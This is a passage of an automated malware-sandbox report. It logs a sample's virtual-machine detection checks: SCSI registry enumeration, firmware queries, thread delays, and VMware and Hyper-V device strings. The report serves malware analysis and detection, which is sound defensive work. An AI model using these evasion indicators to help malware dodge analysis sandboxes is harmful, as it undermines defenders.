      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\tttcvvaAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\tttcvvaAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 445Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1224Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 907Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1287Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3512Thread sleep count: 445 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3020Thread sleep count: 1224 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3020Thread sleep time: -122400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3736Thread sleep count: 907 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3736Thread sleep time: -90700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6252Thread sleep count: 283 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6272Thread sleep count: 289 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6276Thread sleep count: 261 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3020Thread sleep count: 1287 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3020Thread sleep time: -128700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e\xe
      Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual d
      Source: explorer.exe, 0000000B.00000003.2714096371.00000000084E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000000@v
      Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2677069781.0000000008401000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 0000000B.00000003.2628907119.000000000487E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}NWTVCDUMO
      Source: explorer.exe, 0000000B.00000003.2711717096.000000000B5F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}erMana
      Source: explorer.exe, 0000000B.00000003.2714096371.00000000084E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 0000000B.00000003.2719921099.000000000B6DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}P
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e=C:SystemRoot=C:\WindowsTEMP=
      Source: explorer.exe, 0000000B.00000002.2963794054.000000000838F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\e
      Source: explorer.exe, 0000000B.00000003.2724139513.000000000B65C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SIk&Ven_VMware&Prod_Virtual_disk\4
      Source: explorer.exe, 0000000B.00000003.2632962015.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}34-1002_Classes\CLSID\{c53@
      Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.004D7-9371-BEB064C98683}\0\::{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd}I!
      Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdo
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e
      Source: explorer.exe, 00000001.00000000.1775499027.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTroVMWare
      Source: explorer.exe, 00000001.00000000.1777648899.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 0000000B.00000002.2969569180.000000000B5A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00 !
      Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1778598700.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
      Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
      Source: explorer.exe, 0000000B.00000003.2709874826.00000000084E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000@v
      Source: explorer.exe, 0000000B.00000003.2724139513.000000000B65C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
      Source: explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000D
      Source: explorer.exe, 0000000B.00000002.2963794054.00000000083F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.004
      Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 0000000B.00000003.2709874826.00000000084E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}s.dll
      Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
      Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ComSpe
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}f9507e
      Source: explorer.exe, 0000000B.00000003.2680300536.0000000004852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
      Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{v
      Source: explorer.exe, 0000000B.00000003.2632962015.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@2
